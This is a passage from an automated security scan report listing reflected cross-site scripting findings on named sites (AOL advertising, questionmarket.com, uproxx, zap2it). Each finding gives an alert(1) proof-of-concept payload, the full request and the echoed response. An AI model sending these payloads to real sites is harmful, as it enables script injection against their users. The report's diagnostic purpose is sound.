   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/5bd70"-alert(1)-"dfbccaadf2d/8/3/144927758/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

4.101. http://advertising.aol.com/token/8/3/144927758/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/8/3/144927758/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22ce9"><script>alert(1)</script>8c28112e197 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /22ce9"><script>alert(1)</script>8c28112e197/8/3/144927758/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:11 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/22ce9"><script>alert(1)</script>8c28112e197/8/3/144927758/" />
...[SNIP]...

4.102. http://amch.questionmarket.com/adscgen/d_layer.php [lang parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/d_layer.php

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4baab'%3balert(1)//ad8fd748637 was submitted in the lang parameter. This input was echoed as 4baab';alert(1)//ad8fd748637 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=4baab'%3balert(1)//ad8fd748637&from_node=28067&site=8 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:38:46 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b103.dl
Content-Type: text/html
Content-Length: 12165

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...
eyClickthru = 1;
}
   DL_Close(false);

window.top.location.href='http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=918801&from_node=28067&site=8&frame=&lang=4baab';alert(1)//ad8fd748637&dl_logo=&invite=no&link='+escape(window.location.href)+'&orig='+escape(window.location.href);
}

function DL_Close(adscout) {
   if (typeof adscout == 'undefined' || adscout == true) {
       DL_Adscout(adsc
...[SNIP]...

4.103. http://amch.questionmarket.com/adscgen/d_layer.php [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/d_layer.php

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b71a"%3balert(1)//b7312e4f877 was submitted in the site parameter. This input was echoed as 2b71a";alert(1)//b7312e4f877 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=82b71a"%3balert(1)//b7312e4f877 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:00 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Content-Type: text/html
Content-Length: 12193

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...
t);
   }
   // Set a flag so animation loop will stop running
   DL_ScrollState = 2;
   DL_Scroll();
}

function DL_Adscout(adscout) {
   (new Image).src="//amch.questionmarket.com/adscgen/adscout_dc.php?site=82b71a";alert(1)//b7312e4f877&code=&survey_num=918801&ord="+Math.floor((new Date()).getTime());
}

function DL_Add(){
   DL_InsertSwf();
}

function DL_FlashInstalled() {
   // Detect swf plugin.

   var result = false;
   if (navigator.m
...[SNIP]...

4.104. http://amch.questionmarket.com/adscgen/d_layer.php [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/d_layer.php

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb6b3'%3balert(1)//069defae92d was submitted in the site parameter. This input was echoed as cb6b3';alert(1)//069defae92d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8cb6b3'%3balert(1)//069defae92d HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:00 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b101.dl
Content-Type: text/html
Content-Length: 12193

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...

   DL_SurveyClickthru = 1;
}
   DL_Close(false);

window.top.location.href='http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=918801&from_node=28067&site=8cb6b3';alert(1)//069defae92d&frame=&lang=&dl_logo=&invite=no&link='+escape(window.location.href)+'&orig='+escape(window.location.href);
}

function DL_Close(adscout) {
   if (typeof adscout == 'undefined' || adscout == true) {
       DL
...[SNIP]...

4.105. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [lang parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/dynamiclink.js.php

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c196d'-alert(1)-'13129391a78 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=918801&lang=c196d'-alert(1)-'13129391a78&from_node=28067&site=8 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:07 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b101.dl
Set-Cookie: LP=1316277547; expires=Wed, 21 Sep 2011 20:39:07 GMT; path=/; domain=.questionmarket.com
Content-Length: 2445
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
}
df=biggestframe;
}
d=df.document;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=c196d'-alert(1)-'13129391a78&from_node=28067&site=8';
try {
   if (dle.src.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) {
       dle.src=dle.src.replace('d_layer','h_layer');
   }
} catch (e)
...[SNIP]...

4.106. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/dynamiclink.js.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c194e'-alert(1)-'248affad422 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8&c194e'-alert(1)-'248affad422=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:40:24 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b201.dl
Set-Cookie: LP=1316277624; expires=Wed, 21 Sep 2011 20:40:24 GMT; path=/; domain=.questionmarket.com
Content-Length: 2448
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...

d=df.document;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8&c194e'-alert(1)-'248affad422=1';
try {
   if (dle.src.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) {
       dle.src=dle.src.replace('d_layer','h_layer');
   }
} catch (e) {}
dle.type="text/jav
...[SNIP]...

4.107. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/dynamiclink.js.php

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e7bf'-alert(1)-'5f3356cd700 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=81e7bf'-alert(1)-'5f3356cd700 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:34 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b102.dl
Set-Cookie: LP=1316277574; expires=Wed, 21 Sep 2011 20:39:34 GMT; path=/; domain=.questionmarket.com
Content-Length: 2447
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
}
d=df.document;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=81e7bf'-alert(1)-'5f3356cd700';
try {
   if (dle.src.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) {
       dle.src=dle.src.replace('d_layer','h_layer');
   }
} catch (e) {}
dle.type="text/javas
...[SNIP]...

4.108. http://api.uproxx.com/ulink/feed [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.uproxx.com
Path:	/ulink/feed

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 9e64b<img%20src%3da%20onerror%3dalert(1)>fb9c84b95b7 was submitted in the pid parameter. This input was echoed as 9e64b<img src=a onerror=alert(1)>fb9c84b95b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ulink/feed?pid=1639e64b<img%20src%3da%20onerror%3dalert(1)>fb9c84b95b7&limit=12&c_cats=3,15,17,&uw_nsfw=false&format=json HTTP/1.1
Host: api.uproxx.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:14:57 GMT
Server: Apache
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5055

UPROXXJSON(
[{"category":"TV \/ Movie News","content_title":"Megan Fox Gains Weight, Talks Future","image_url":"http:\/\/ua.uproxxcdn.com\/ejYFCvnvi4xlveI.jpg","content_clicks":"344","source_title":"Moviefone","source_url":"http:\/\/moviefone.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=moviefone.com","content_link":"http:\/\/widget.uproxx.com\/t\/1a107970o1639e64b<img src=a onerror=alert(1)>fb9c84b95b7"},{"category":"Web Culture","content_title":"UPROXX Interview With Charlie Day","image_url":"http:\/\/ua.uproxxcdn.com\/6PxEor9uKEjF6Lm.jpg","content_clicks":"10982","source_title":"Uproxx","source_ur
...[SNIP]...

4.109. http://api.zap2it.com/tvlistings/zcConnector.jsp [aid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.zap2it.com
Path:	/tvlistings/zcConnector.jsp

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 180cc"-alert(1)-"5baa4485817 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tvlistings/zcConnector.jsp?ap=ptg&v=2&aid=f3j180cc"-alert(1)-"5baa4485817&zip=98101&stnlt=10387,10520,10518 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 483
Content-Length: 483
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 16:38:38 GMT
Date: Sat, 17 Sep 2011 16:23:38 GMT
Connection: close
Vary: Accept-Encoding

var validRequest = true;

var server = "http://api.zap2it.com";
var requestParams = "ap=ptg&v=2&aid=f3j180cc"-alert(1)-"5baa4485817&zip=98101&stnlt=10387,10520,10518";
var action;

action = "/tvlistings/ZCPrimeTimeGrid.do?";

if(requestParams!="" && validRequest) {
document.write("<scr" + "ipt ");
document.write("type='t
...[SNIP]...

4.110. http://api.zap2it.com/tvlistings/zcConnector.jsp [ap parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.zap2it.com
Path:	/tvlistings/zcConnector.jsp

Issue detail

The value of the ap request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2c76"-alert(1)-"73c548fbb0a was submitted in the ap parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tvlistings/zcConnector.jsp?ap=ptge2c76"-alert(1)-"73c548fbb0a&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 459
Content-Length: 459
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 16:38:36 GMT
Date: Sat, 17 Sep 2011 16:23:36 GMT
Connection: close
Vary: Accept-Encoding

var validRequest = true;

var server = "http://api.zap2it.com";
var requestParams = "ap=ptge2c76"-alert(1)-"73c548fbb0a&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518";
var action;

validRequest = false;

if(requestParams!="" && validRequest) {
document.write("<scr" + "ipt ");
document.write("type='text/javascri
...[SNIP]...

4.111. http://api.zap2it.com/tvlistings/zcConnector.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.zap2it.com
Path:	/tvlistings/zcConnector.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c254f"-alert(1)-"d4b6e154fab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tvlistings/zcConnector.jsp?ap=ptg&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518&c254f"-alert(1)-"d4b6e154fab=1 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 486
Content-Length: 486
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 16:38:40 GMT
Date: Sat, 17 Sep 2011 16:23:40 GMT
Connection: close
Vary: Accept-Encoding

var validRequest = true;

var server = "http://api.zap2it.com";
var requestParams = "ap=ptg&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518&c254f"-alert(1)-"d4b6e154fab=1";
var action;

action = "/tvlistings/ZCPrimeTimeGrid.do?";

if(requestParams!="" && validRequest) {
document.write("<scr" + "ipt ");
document.write("type='text/javascript' src='" + server
...[SNIP]...

4.112. http://api.zap2it.com/tvlistings/zcConnector.jsp [stnlt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.zap2it.com
Path:	/tvlistings/zcConnector.jsp

Issue detail

The value of the stnlt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9f99"-alert(1)-"c1b02f4a4e4 was submitted in the stnlt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tvlistings/zcConnector.jsp?ap=ptg&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518a9f99"-alert(1)-"c1b02f4a4e4 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 483
Content-Length: 483
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 16:38:39 GMT
Date: Sat, 17 Sep 2011 16:23:39 GMT
Connection: close
Vary: Accept-Encoding

var validRequest = true;

var server = "http://api.zap2it.com";
var requestParams = "ap=ptg&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518a9f99"-alert(1)-"c1b02f4a4e4";
var action;

action = "/tvlistings/ZCPrimeTimeGrid.do?";

if(requestParams!="" && validRequest) {
document.write("<scr" + "ipt ");
document.write("type='text/javascript' src='" + server +
...[SNIP]...

4.113. http://api.zap2it.com/tvlistings/zcConnector.jsp [v parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.zap2it.com
Path:	/tvlistings/zcConnector.jsp

Issue detail

The value of the v request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad912"-alert(1)-"5380e65f37c was submitted in the v parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tvlistings/zcConnector.jsp?ap=ptg&v=2ad912"-alert(1)-"5380e65f37c&aid=f3j&zip=98101&stnlt=10387,10520,10518 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 483
Content-Length: 483
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 16:38:37 GMT
Date: Sat, 17 Sep 2011 16:23:37 GMT
Connection: close
Vary: Accept-Encoding

var validRequest = true;

var server = "http://api.zap2it.com";
var requestParams = "ap=ptg&v=2ad912"-alert(1)-"5380e65f37c&aid=f3j&zip=98101&stnlt=10387,10520,10518";
var action;

action = "/tvlistings/ZCPrimeTimeGrid.do?";

if(requestParams!="" && validRequest) {
document.write("<scr" + "ipt ");
document.write(
...[SNIP]...

4.114. http://api.zap2it.com/tvlistings/zcConnector.jsp [zip parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.zap2it.com
Path:	/tvlistings/zcConnector.jsp

Issue detail

The value of the zip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7182"-alert(1)-"14f2f041e46 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tvlistings/zcConnector.jsp?ap=ptg&v=2&aid=f3j&zip=98101b7182"-alert(1)-"14f2f041e46&stnlt=10387,10520,10518 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
